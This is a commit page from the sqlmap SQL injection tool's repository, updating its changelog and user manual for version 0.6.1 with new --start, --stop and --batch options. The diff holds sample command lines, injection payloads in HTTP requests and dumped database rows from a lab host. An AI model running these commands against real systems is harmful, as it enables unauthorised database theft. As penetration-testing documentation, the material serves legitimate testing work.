sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 18:07:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

Updated site, documentation (dev and user) and packaging scripts for 0.6.1

Browse Source
This commit is contained in:
Bernardo Damele 2008-10-20 13:43:18 +00:00
parent 6ddb5afef9
commit fcc16b2346
6 changed files with 292 additions and 102 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
doc/ChangeLog
View File

@ -2,7 +2,7 @@ sqlmap (0.6.1-1) stable; urgency=low
* Major bug fix to blind SQL injection bisection algorithm to handle an
exception;
* Added a Metasploit 3 auxiliary module to run sqlmap;
* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
* Implemented possibility to test for and inject also on LIKE
statements;
* Implemented --start and --stop options to set the first and the last
@ -12,6 +12,9 @@ sqlmap (0.6.1-1) stable; urgency=low
* Minor enhancement to save also the length of query output in the
session file when retrieving the query output length for ETA or for
resume purposes;
* Changed the order sqlmap dump table entries from column by column to
row by row. Now it also dumps entries as they are stored in the tables,
not forcing the entries' order alphabetically anymore;
* Minor bug fix to correctly handle parameters' value with % character.
-- Bernardo Damele A. G. <bernardo.damele@gmail.com> Fri, 10 Oct 2008 10:00:00 +0100

148
doc/README.html
View File

@ -245,8 +245,8 @@ those that vary the HTTP response page content.
On the dynamic ones sqlmap automatically tests and detects the ones
affected by SQL injection. Each dynamic parameter is tested for
<EM>numeric</EM>, <EM>single quoted string</EM>, <EM>double quoted
string</EM> and all of these three datatypes with zero, one and two
parenthesis to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
string</EM> and all of these three datatypes with zero to two parenthesis
to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
perform further injections with. It is also possible to specify the
parameter(s) that you want to perform tests and use for injection on.</LI>
<LI>Option to specify the <B>maximum number of concurrent HTTP
@ -277,6 +277,9 @@ and <B>resume the injection from this file in a second time</B>.</LI>
<LI>Support to read options from a configuration INI file rather than
specify each time all of the options on the command line. Support also to
save command line options on a configuration INI file.</LI>
<LI>Integration with other IT security related open source projects,
<A HREF="http://metasploit.com/framework/">Metasploit</A> and
<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
<LI><B>PHP setting <CODE>magic_quotes_gpc</CODE> bypass</B> by encoding
every query string, between single quotes, with <CODE>CHAR</CODE>, or similar,
database management system function.</LI>
@ -292,19 +295,19 @@ It is available in various formats:</P>
<P>
<UL>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip">Source zip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip">Source zip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
other Debian derivated GNU/Linux distribution.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
other operating system that can install RPM packages.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
interpreter</B> to be installed on the operating system.</LI>
</UL>
</P>
@ -331,7 +334,7 @@ and
<PRE>
$ python sqlmap.py -h
sqlmap/0.6.1.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
sqlmap/0.6.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
and Daniele Bellucci &lt;daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u &lt;URL> | -g &lt;google dork> | -c &lt;config file>}
@ -379,13 +382,16 @@ Options:
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C)
--dump Dump DBMS database table entries (req: -T, -D opt: -C,
--start, --stop)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First table entry to dump
--stop=LIMITSTOP Last table entry to dump
--sql-query=QUERY SQL SELECT query to be executed
--sql-shell Prompt for an interactive SQL shell
@ -417,6 +423,7 @@ Options:
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</PRE>
</CODE></BLOCKQUOTE>
</P>
@ -528,7 +535,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:28] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:29] [INFO] testing MySQL
@ -537,7 +544,7 @@ Connection: close
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</PRE>
@ -555,7 +562,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:32] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@ -573,7 +580,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@ -600,7 +607,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:23] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@ -2042,7 +2049,8 @@ is connected to, which is always <CODE>public</CODE>.</P>
<H3>Dump database tables entries</H3>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
<CODE>--start</CODE> and <CODE>--stop</CODE></P>
<P>It is possible to dump the entries for a specific database table.
This functionality depends on both <CODE>-T</CODE> to specify the table name
@ -2058,15 +2066,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
</PRE>
</CODE></BLOCKQUOTE>
</P>
@ -2112,15 +2120,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
Database: public
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
192.168.1.121/dump/public/users.csv'
@ -2138,6 +2146,40 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</CODE></BLOCKQUOTE>
</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE> option
to limit the dump to a range of entries.</P>
<P>
<UL>
<LI><CODE>--start</CODE> specifies the first entry to enumerate</LI>
<LI><CODE>--stop</CODE> specifies the last entry to enumerate</LI>
</UL>
</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" --dump \
-T users -D test --start 2 --stop 4
Database: test
Table: users
[3 entries]
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
+----+----------------------------------------------+-------------------+
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, sqlmap is very flexible: you can leave it automatically
enumerate the whole database table up to a single column of a specific
table entry.</P>
<H3>Dump all databases tables entries</H3>
@ -2153,15 +2195,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
Database: information_schema
Table: CHARACTER_SETS
@ -2246,15 +2288,15 @@ Table: spt_datatype_info_ext
Database: master
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
[...]
</PRE>
@ -3123,7 +3165,8 @@ back-end DBMS: MySQL >= 5.0.0
<P>Option: <CODE>--save</CODE></P>
<P>It is possible to save the command line options to a configuration INI
file.</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
@ -3231,6 +3274,53 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</P>
<H3>Act in non-interactive mode</H3>
<P>Option: <CODE>--batch</CODE></P>
<P>If you want sqlmap to run as a batch tool, without interacting with you in
case of a choice has to be done, you can force it by using <CODE>--batch</CODE>
option than letting sqlmap go for a default behaviour.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" -v 1 \
--batch
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
[hh:mm:22] [INFO] GET parameter 'name' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
[0] place: GET, parameter: id, type: numeric (default)
[1] place: GET, parameter: name, type: stringsingle
[q] Quit
Choice: 0
[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
[...]
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, sqlmap choosed automatically to injection on the first
vulnerable parameter which is the default behaviour.</P>
<H2><A NAME="s6">6.</A> <A HREF="#toc6">Disclaimer</A></H2>
<P>sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY

BIN
doc/README.pdf
View File

Binary file not shown.

147
doc/README.sgml
View File

@ -207,8 +207,8 @@ those that vary the HTTP response page content.
On the dynamic ones sqlmap automatically tests and detects the ones
affected by SQL injection. Each dynamic parameter is tested for
<em>numeric</em>, <em>single quoted string</em>, <em>double quoted
string</em> and all of these three datatypes with zero, one and two
parenthesis to correctly detect which is the <tt>SELECT</tt> statement syntax to
string</em> and all of these three datatypes with zero to two parenthesis
to correctly detect which is the <tt>SELECT</tt> statement syntax to
perform further injections with. It is also possible to specify the
parameter(s) that you want to perform tests and use for injection on.
<item>Option to specify the <bf>maximum number of concurrent HTTP
@ -239,6 +239,9 @@ and <bf>resume the injection from this file in a second time</bf>.
<item>Support to read options from a configuration INI file rather than
specify each time all of the options on the command line. Support also to
save command line options on a configuration INI file.
<item>Integration with other IT security related open source projects,
<htmlurl url="http://metasploit.com/framework/" name="Metasploit"> and <htmlurl
url="http://w3af.sourceforge.net/" name="w3af">.
<item><bf>PHP setting <tt>magic_quotes_gpc</tt> bypass</bf> by encoding
every query string, between single quotes, with <tt>CHAR</tt>, or similar,
database management system function.
@ -254,19 +257,19 @@ name="SourceForge File List page">.
It is available in various formats:
<itemize>
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz"
name="Source gzip compressed"> operating system independent.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2"
name="Source bzip2 compressed"> operating system independent.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip"
name="Source zip compressed"> operating system independent.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb"
name="DEB binary package"> architecture independent for Debian and any
other Debian derivated GNU/Linux distribution.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm"
name="RPM binary package"> architecture independent for Fedora and any
other operating system that can install RPM packages.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip"
name="Portable executable for Windows"> that <bf>does not require the Python
interpreter</bf> to be installed on the operating system.
</itemize>
@ -294,7 +297,7 @@ and <htmlurl url="mailto:daniele.bellucci@gmail.com" name="Daniele Bellucci">.
<tscreen><verb>
$ python sqlmap.py -h
sqlmap/0.6.1.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u <URL> | -g <google dork> | -c <config file>}
@ -342,13 +345,16 @@ Options:
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C)
--dump Dump DBMS database table entries (req: -T, -D opt: -C,
--start, --stop)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First table entry to dump
--stop=LIMITSTOP Last table entry to dump
--sql-query=QUERY SQL SELECT query to be executed
--sql-shell Prompt for an interactive SQL shell
@ -380,6 +386,7 @@ Options:
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</verb></tscreen>
@ -486,7 +493,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:28] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:29] [INFO] testing MySQL
@ -495,7 +502,7 @@ Connection: close
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</verb></tscreen>
@ -511,7 +518,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:32] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@ -529,7 +536,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@ -554,7 +561,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:23] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@ -1977,7 +1984,8 @@ is connected to, which is always <tt>public</tt>.
<sect2>Dump database tables entries
<p>
Options: <tt>--dump</tt>, <tt>-C</tt>, <tt>-T</tt> and <tt>-D</tt>
Options: <tt>--dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
<tt>--start</tt> and <tt>--stop</tt>
<p>
It is possible to dump the entries for a specific database table.
@ -1994,15 +2002,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
</verb></tscreen>
<p>
@ -2046,15 +2054,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
Database: public
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
192.168.1.121/dump/public/users.csv'
@ -2070,6 +2078,39 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
"5","","nameisnull"
</verb></tscreen>
<p>
You can also provide the <tt>--start</tt> and/or the <tt>--stop</tt> option
to limit the dump to a range of entries.
<itemize>
<item><tt>--start</tt> specifies the first entry to enumerate
<item><tt>--stop</tt> specifies the last entry to enumerate
</itemize>
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" --dump \
-T users -D test --start 2 --stop 4
Database: test
Table: users
[3 entries]
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
+----+----------------------------------------------+-------------------+
</verb></tscreen>
<p>
As you can see, sqlmap is very flexible: you can leave it automatically
enumerate the whole database table up to a single column of a specific
table entry.
<sect2>Dump all databases tables entries
@ -2087,15 +2128,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
Database: information_schema
Table: CHARACTER_SETS
@ -2179,15 +2220,15 @@ Table: spt_datatype_info_ext
Database: master
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
[...]
</verb></tscreen>
@ -3039,6 +3080,8 @@ back-end DBMS: MySQL >= 5.0.0
Option: <tt>--save</tt>
<p>
It is possible to save the command line options to a configuration INI
file.
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
@ -3140,6 +3183,54 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</verb></tscreen>
<sect2>Act in non-interactive mode
<p>
Option: <tt>--batch</tt>
<p>
If you want sqlmap to run as a batch tool, without interacting with you in
case of a choice has to be done, you can force it by using <tt>--batch</tt>
option than letting sqlmap go for a default behaviour.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" -v 1 \
--batch
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
[hh:mm:22] [INFO] GET parameter 'name' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
[0] place: GET, parameter: id, type: numeric (default)
[1] place: GET, parameter: name, type: stringsingle
[q] Quit
Choice: 0
[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
[...]
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<p>
As you can see, sqlmap choosed automatically to injection on the first
vulnerable parameter which is the default behaviour.
<sect>Disclaimer
<p>

6
doc/THANKS
View File

@ -87,12 +87,12 @@ M Simkin <mlsimkin@cox.net>
Alessandro Tanasi <alessandro@tanasi.it>
for extensively beta-testing sqlmap
for suggesting many features and reporting some minor bugs
for suggesting many features and reporting some bugs
Efrain Torres <et@metasploit.com>
for helping me out to improve the Metasploit Framework 3 sqlmap
auxiliary module and the integration with Metasploit WMAP framework
for his great Metasploit WMAP framework
auxiliary module and the integration with Metasploit WMAP Framework
for his great Metasploit WMAP Framework
Sandro Tosi <matrixhasu@gmail.com>
for helping to create sqlmap Debian package correctly

8
extra/msfauxmod/README → extra/msfauxmod/README.txt
View File

@ -1,5 +1,11 @@
To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
the example below:
the example below.
Note that if you are willing to run Metasploit's sqlmap auxiliary module on
Metasploit Framework 3.0 or 3.1 you first need to copy wmap_sqlmap.rb to
your <msf3 root path>/modules/auxiliary/scanner/http/ folder then launch
msfconsole because this module has been officially integrated in Metasploit
from the release 3.2.
$ ./msfconsole